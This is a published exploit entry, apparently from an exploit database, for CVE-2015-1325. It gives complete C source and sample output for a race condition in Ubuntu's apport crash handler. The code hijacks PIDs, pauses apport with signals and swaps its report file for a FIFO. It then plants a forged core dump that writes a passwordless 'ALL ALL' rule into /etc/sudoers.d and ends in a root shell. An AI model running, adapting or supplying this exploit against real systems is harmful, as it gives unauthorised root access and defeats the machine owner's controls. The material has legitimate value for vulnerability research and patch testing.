apport/ubuntu local root race condition

[a.linm]

/*

# Exploit Title: apport/ubuntu local root race condition

# Date: 2015-05-11

# Exploit Author: rebel

# Version: ubuntu 14.04, 14.10, 15.04

# Tested on: ubuntu 14.04, 14.10, 15.04

# CVE : CVE-2015-1325

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

CVE-2015-1325 / apport-pid-race.c

apport race conditions

ubuntu local root

tested on ubuntu server 14.04, 14.10, 15.04

core dropping bug also works on older versions, but you can't

write arbitrary contents. on 12.04 /etc/logrotate.d might work,

didn't check. sudo and cron will complain if you drop a real ELF

core file in sudoers.d/cron.d

unpriv@ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race

created /var/crash/_bin_sleep.1002.crash

crasher: my pid is 1308

apport stopped, pid = 1309

getting pid 1308

current pid = 1307..2500..5000..7500..10000........

** child: current pid = 1308

** child: executing /bin/su

Password: sleeping 2s..

checker: mode 4532

waiting for file to be unlinked..writing to fifo

fifo written.. wait...

waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done

checker: SIGCONT

checker: writing core

checker: done

success

# id

uid=0(root) gid=0(root) groups=0(root)

85ad63cf7248d7da46e55fa1b1c6fe01dea43749

2015-05-10

%rebel%

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

*/

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <signal.h>

#include <sys/mman.h>

#include <sys/syscall.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <sys/resource.h>

#include <unistd.h>

#include <string.h>

#include <sys/wait.h>

char *crash_report = "ProblemType: Crash\nArchitecture: amd64\nCrashCounter: 0\nDate: Sat May 9 18:18:33 2015\nDistroRelease: Ubuntu 15.04\nExecutablePath: /bin/sleep\nExecutableTimestamp: 1415000653\nProcCmdline: sleep 1337\nProcCwd: /home/rebel\nProcEnviron:\n XDG_RUNTIME_DIR=<set>\nProcMaps:\n 00400000-00407000 r-xp 00000000 08:01 393307 /bin/sleep\nProcStatus:\n Name: sleep\nSignal: 11\nUname: Linux 3.19.0-15-generic x86_64\nUserGroups:\n_LogindSession: 23\nCoreDump: base64\n H4sICAAAAAAC/0NvcmVEdW1wAA==\n U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\n";

/*

last line is the stuff we write to the corefile

c = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)

t = '# \x01\x02\x03\x04\n\n\nALL ALL=(ALL) NOPASSWD: ALL\n'

# need some non-ASCII bytes so it doesn't turn into a str()

# which makes apport fail with the following error:

# os.write(core_file, r['CoreDump'])

# TypeError: 'str' does not support the buffer interface

t = bytes(t,'latin1')

c.compress(t)

a = c.flush()

import base64

base64.b64encode(a)

# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='

*/

int apport_pid;

char report[128];

void steal_pid(int wanted_pid)

{

int x, pid;

pid = getpid();

fprintf(stderr,"getting pid %d\n", wanted_pid);

fprintf(stderr,"current pid = %d..", pid);

for(x = 0; x < 500000; x++) {

pid = fork();

if(pid == 0) {

pid = getpid();

if(pid % 2500 == 0)

fprintf(stderr,"%d..", pid);

if(pid == wanted_pid) {

fprintf(stderr,"\n** child: current pid = %d\n", pid);

fprintf(stderr,"** child: executing /bin/su\n");

execl("/bin/su", "su", NULL);

}

exit(0);

return;

}

if(pid == wanted_pid)

return;

wait(NULL);

}

}

void checker(void)

{

struct stat s;

int fd, mode, x;

stat(report, &s);

fprintf(stderr,"\nchecker: mode %d\nwaiting for file to be unlinked..", s.st_mode);

mode = s.st_mode;

while(1) {

// poor man's pseudo-singlestepping

kill(apport_pid, SIGCONT);

kill(apport_pid, SIGSTOP);

// need to wait a bit for the signals to be handled,

// otherwise we'll miss when the new report file is created

for(x = 0; x < 100000; x++);

stat(report, &s);

if(s.st_mode != mode)

break;

}

fprintf(stderr,"\nchecker: new mode %d .. done\n", s.st_mode);

unlink(report);

mknod(report, S_IFIFO | 0666, 0);

fprintf(stderr,"checker: SIGCONT\n");

kill(apport_pid, SIGCONT);

fprintf(stderr,"checker: writing core\n");

fd = open(report, O_WRONLY);

write(fd, crash_report, strlen(crash_report));

close(fd);

fprintf(stderr,"checker: done\n");

while(1)

sleep(1);

}

void crasher()

{

chdir("/etc/sudoers.d");

fprintf(stderr,"crasher: my pid is %d\n", getpid());

execl("/bin/sleep", "sleep", "1337", NULL);

exit(0);

}

int main(void)

{

int pid, checker_pid, fd;

struct rlimit limits;

struct stat s;

limits.rlim_cur = RLIM_INFINITY;

limits.rlim_max = RLIM_INFINITY;

setrlimit(RLIMIT_CORE, &limits);

pid = fork();

if(pid == 0)

crasher();

sprintf(report, "/var/crash/_bin_sleep.%d.crash", getuid());

unlink(report);

mknod(report, S_IFIFO | 0666, 0);

fprintf(stderr,"created %s\n", report);

usleep(300000);

kill(pid, 11);

apport_pid = pid + 1;

// could check that pid+1 is actually apport here but it's

// kind of likely

fprintf(stderr,"apport stopped, pid = %d\n", apport_pid);

usleep(300000);

kill(pid, 9);

steal_pid(pid);

sleep(1);

kill(apport_pid, SIGSTOP);

checker_pid = fork();

if(checker_pid == 0) {

checker();

exit(0);

}

fprintf(stderr,"sleeping 2s..\n");

sleep(2);

fprintf(stderr,"writing to fifo\n");

fd = open(report, O_WRONLY);

write(fd, crash_report, strlen(crash_report));

close(fd);

fprintf(stderr,"fifo written.. wait...\n");

fprintf(stderr,"waiting for /etc/sudoers.d/core to appear..\n");

while(1) {

stat("/etc/sudoers.d/core", &s);

if(s.st_size == 37)

break;

usleep(100000);

}

fprintf(stderr,"success\n");

kill(pid, 9);

kill(checker_pid, 9);

return system("sudo -- sh -c 'stty echo;sh -i'");

}

https://www.exploit-db.com/exploits/37088/